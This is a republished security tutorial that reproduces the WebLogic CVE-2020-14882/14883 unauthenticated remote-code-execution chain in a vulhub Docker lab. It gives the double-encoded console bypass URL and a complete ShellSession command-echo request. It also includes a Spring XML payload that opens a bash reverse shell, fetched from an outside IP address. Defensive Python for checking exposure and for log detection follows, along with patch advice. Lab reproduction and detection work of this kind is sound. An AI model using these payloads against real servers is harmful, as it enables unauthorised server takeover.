How to reproduce the WebLogic unauthenticated command execution vulnerabilities (CVE-2020-14882 / CVE-2020-14883)

2025-01-24 Update From: SLTechnology News&Howtos, Network Security

Shulou(Shulou.com)05/31 Report--

This article shows how to reproduce the WebLogic unauthenticated command execution vulnerability chain. The content is concise and easy to follow, and I hope you get something out of the detailed walkthrough.

Brief introduction

WebLogic is one of Oracle's flagship products and the leading J2EE application server in the commercial market. It was the first commercially successful J2EE application server and is widely deployed wherever Java application servers are used.

Overview

On October 21, Oracle published its Critical Patch Update advisory covering high-risk vulnerabilities in hundreds of components. Among them, CVE-2020-14882 and CVE-2020-14883 can be chained so that an unauthenticated attacker bypasses the WebLogic console login and ends up executing code remotely, taking over the WebLogic server. Exploitation is very easy and the risk is very high.

The vulnerabilities are located in the WebLogic administration console. The console ships with every full WebLogic installation, and the vulnerabilities are exploited over plain HTTP.

CVE-2020-14882 allows an unauthenticated user to bypass the administration console's authentication and reach the backend; CVE-2020-14883 allows any console user to execute arbitrary commands over HTTP. Chaining the two, an unauthenticated attacker can execute commands on a remote WebLogic server with a single GET request.

Affected versions

WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0

Environment building

Here we use the vulhub environment for reproduction. Create a new docker-compose.yml:

version: '2'
services:
  weblogic:
    image: vulhub/weblogic:12.2.1.3-2018
    ports:
      - "7001:7001"

Run the following command to pull the image and start a container that exposes the console on port 7001:

docker-compose up -d

Vulnerability reproduction

Authentication bypass (CVE-2020-14882):

Because CVE-2020-14882 is an authentication bypass for the administration console, the target must have the console deployed. Open a browser and visit:

http://ip:port/console

If the console is present, normal access prompts for a username and password. With the bypass, you reach the console backend directly without authenticating:

URL:/console/css/%252e%252e%252fconsole.portal

Console page reached through the unauthenticated bypass:

Console page after logging in normally with an account and password:

Comparing the two, the console reached through the bypass lacks functions such as Deployments because the bypassed request carries no real privileges, so you cannot obtain a shell simply by deploying a WAR package from the backend. "%252E%252E%252F" is "../" URL-encoded twice: a request path under /console/css/ is treated as a static resource that needs no authentication, and after the console decodes the path a second time the traversal resolves it to console.portal, which is how the management backend is reached without credentials.
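A non-destructive way to check for the bypass described above, as an added example (this is not code from the article or from vulhub): it sends the same double-URL-encoded path over a raw HTTP connection, which does not normalise or re-encode the path the way a browser might, and classifies the reply. The marker it looks for, a login form field named j_username, and the status-code mapping are assumptions; a 200 without the login form is treated as bypassed.

```python
"""Non-destructive check for the CVE-2020-14882 console authentication bypass.

Added example, not taken from the article or from vulhub. It requests the
double-encoded path unauthenticated and classifies the response. Marker
strings and status mapping below are assumptions, not WebLogic documentation.
"""
import http.client
import sys
from urllib.parse import unquote, urlsplit

# Double-encoded "../": /console/css/ is served as a static resource without
# authentication, and the console decodes the path once more before routing it.
TRAVERSAL = "%252e%252e%252f"
BYPASS_PATH = "/console/css/" + TRAVERSAL + "console.portal"


def double_decode(segment: str) -> str:
    """Decode a URL segment twice, the way the console ends up treating it."""
    return unquote(unquote(segment))


def classify(status: int, body: str) -> str:
    """Map an HTTP reply to a verdict.

    Assumption: the console login page carries a form field named j_username,
    while the console page reached through the bypass does not.
    """
    if status == 200 and "j_username" not in body:
        return "bypassed"
    if status in (302, 401, 403) or "j_username" in body:
        return "blocked"
    return "unknown"


def check(base_url: str, timeout: float = 5.0) -> str:
    """Send the bypass request to base_url (e.g. http://127.0.0.1:7001)."""
    u = urlsplit(base_url)
    https = u.scheme == "https"
    conn_cls = http.client.HTTPSConnection if https else http.client.HTTPConnection
    conn = conn_cls(u.hostname, u.port or (443 if https else 80), timeout=timeout)
    try:
        # http.client sends the path byte-for-byte; redirects are not followed,
        # so a 302 to the login page is observed as such.
        conn.request("GET", BYPASS_PATH,
                     headers={"Host": u.netloc, "User-Agent": "cve-2020-14882-check"})
        resp = conn.getresponse()
        body = resp.read(200_000).decode("utf-8", "replace")
        return classify(resp.status, body)
    finally:
        conn.close()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:7001"
    print(target, check(target))
```

Run it as `python3 check.py http://192.168.74.141:7001` against the vulhub container; a "bypassed" verdict means the unauthenticated request returned the console page rather than the login form or a redirect.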

Backend arbitrary command execution (CVE-2020-14883):

Exploitation method 1

com.tangosol.coherence.mvel2.sh.ShellSession

This method only works on WebLogic 12.2.1 and later, because the com.tangosol.coherence.mvel2.sh.ShellSession class does not exist in 10.3.6.

Executing the id command on version 12.2.1.3 with Burp Suite (the command is carried in the cmd request header; no session cookie is needed, so only the headers the request relies on are shown):

GET /console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%27weblogic.work.ExecuteThread%20currentThread%20=%20(weblogic.work.ExecuteThread)Thread.currentThread();%20weblogic.work.WorkAdapter%20adapter%20=%20currentThread.getCurrentWork();%20java.lang.reflect.Field%20field%20=%20adapter.getClass().getDeclaredField(%22connectionHandler%22);field.setAccessible(true);Object%20obj%20=%20field.get(adapter);weblogic.servlet.internal.ServletRequestImpl%20req%20=%20(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(%22getServletRequest%22).invoke(obj);%20String%20cmd%20=%20req.getHeader(%22cmd%22);String[]%20cmds%20=%20System.getProperty(%22os.name%22).toLowerCase().contains(%22window%22)%20?%20new%20String[]{%22cmd.exe%22,%20%22/c%22,%20cmd}:new%20String[]{%22/bin/sh%22,%20%22-c%22,%20cmd};if(cmd%20!=%20null%20){%20String%20result%20=%20new%20java.util.Scanner(new%20java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(%22\\A%22).next();%20weblogic.servlet.internal.ServletResponseImpl%20res%20=%20(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(%22getResponse%22).invoke(req);res.getServletOutputStream().writeStream(new%20weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();}%20currentThread.interrupt();%27) HTTP/1.1
Host: 192.168.74.141:7001
cmd: id
Connection: close

Echo payload, URL-decoded. This is the MVEL script that ShellSession evaluates: it walks from the current worker thread to the underlying servlet request, reads the command from the cmd header, runs it through ProcessBuilder, and writes the output straight back into the HTTP response, so the result is echoed to the attacker:

weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread();
weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj);
String cmd = req.getHeader("cmd");
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
if (cmd != null) {
    String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next();
    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);
    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
    res.getServletOutputStream().flush();
}
currentThread.interrupt();

On version 10.3.6 the same request returns an error, because the ShellSession class is not present.

Exploitation method 2

com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

This approach is more general: it was first used for CVE-2019-2725 and works on all affected WebLogic versions.

First, construct an XML file and host it on an HTTP server that WebLogic can reach. The file is a Spring beans definition that starts a java.lang.ProcessBuilder; here it launches a reverse shell (replace ip with the listener's address), for example http://example.com/rce.xml:

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>/bin/bash</value>
                <value>-c</value>
                <value><![CDATA[bash -i >& /dev/tcp/ip/1234 0>&1]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

Start an nc listener on port 1234, then send the following GET request (the handle parameter names the gadget class and passes it the URL of the hosted XML):

Http://192.168.74.141:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://139.9.198.30/rce.xml")

The nc listener receives the reverse shell.

Tested: this method works on both 12.2.1.3 and 10.3.6.
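Both exploitation methods above, and the double-encoded traversal used for the bypass, leave distinctive traces in HTTP access logs. The following detection logic is an added example (not part of the article or of vulhub): it double-decodes the request path the way the console does, flags a path under /console/css/ that resolves to a console .portal page, and flags the two gadget classes used above when they appear in the handle or test_handle parameter. The log lines are constructed for the example and the combined-log format regex is an assumption about the log source.

```python
"""Detect CVE-2020-14882 / CVE-2020-14883 exploitation attempts in access logs.

Added example, not part of the article. Log lines below are constructed;
the log format regex is an assumption about the source being monitored.
"""
import re
from urllib.parse import unquote, urlsplit

# Gadget classes observed in the two exploitation methods.
GADGETS = (
    "com.tangosol.coherence.mvel2.sh.ShellSession",
    "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext",
)

# Common log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# Constructed sample: one normal login, three attack requests, one static file.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Oct/2020:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1234',
    '10.0.0.9 - - [28/Oct/2020:10:01:05 +0000] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 5678',
    '10.0.0.9 - - [28/Oct/2020:10:01:09 +0000] "GET /console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%27weblogic.work.ExecuteThread%20currentThread%27) HTTP/1.1" 200 40',
    '10.0.0.9 - - [28/Oct/2020:10:01:12 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://attacker.example/rce.xml%22) HTTP/1.1" 302 0',
    '10.0.0.5 - - [28/Oct/2020:10:02:00 +0000] "GET /console/css/console.css HTTP/1.1" 200 300',
]


def normalise(path: str) -> str:
    """Decode the path twice and collapse '.' / '..' segments, as the console did."""
    decoded = unquote(unquote(path))
    parts = []
    for seg in decoded.split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts)


def gadget_hits(query: str):
    """Return (param, gadget) pairs for handle/test_handle values naming a gadget."""
    hits = []
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        if key in ("handle", "test_handle"):
            val = unquote(unquote(val))
            for gadget in GADGETS:
                if val.startswith(gadget):
                    hits.append((key, gadget))
    return hits


def analyse(target: str):
    """Findings for one request target (path plus query string)."""
    findings = []
    u = urlsplit(target)
    raw_path = u.path
    # Bypass: a "static" css path that, once fully decoded, lands on a .portal page.
    if "/console/css/" in raw_path.lower():
        resolved = normalise(raw_path)
        if resolved.lower().startswith("/console/") and resolved.lower().endswith(".portal"):
            findings.append(f"CVE-2020-14882 auth bypass: {raw_path} -> {resolved}")
    for key, gadget in gadget_hits(u.query):
        findings.append(f"CVE-2020-14883 gadget in {key}: {gadget}")
    return findings


def scan(lines):
    """Parse log lines and return one alert dict per line with findings."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyse(m.group("target"))
        if findings:
            alerts.append({"ip": m.group("ip"), "status": int(m.group("status")),
                           "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["ip"], alert["status"], "; ".join(alert["findings"]))
```

The bypass rule deliberately keys on the resolved path rather than on the literal "%252e" string, so single-encoded or mixed-case variants that still resolve to a .portal page are caught as well; the gadget rule matches on the decoded class name, which legitimate console navigation never places in handle or test_handle. The request status is kept in the alert because a 302 on the FileSystemXmlApplicationContext request does not mean the attempt failed: the bean is instantiated before the redirect is issued.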

Vulnerability fix

Oracle has released an official patch for these vulnerabilities; download and install it promptly. Downloading Oracle patches requires a licensed support account: log in to https://support.oracle.com with that account to obtain the latest patch. Until the patch is applied, restricting network access to the /console path to trusted administrative addresses removes the unauthenticated attack surface used by this chain.

The above is how to reproduce the WebLogic unauthenticated command execution vulnerabilities. I hope you have picked up some knowledge or skills; if you want to learn more, you are welcome to follow the industry information channel.


© 2024 shulou.com SLNews company. All rights reserved.
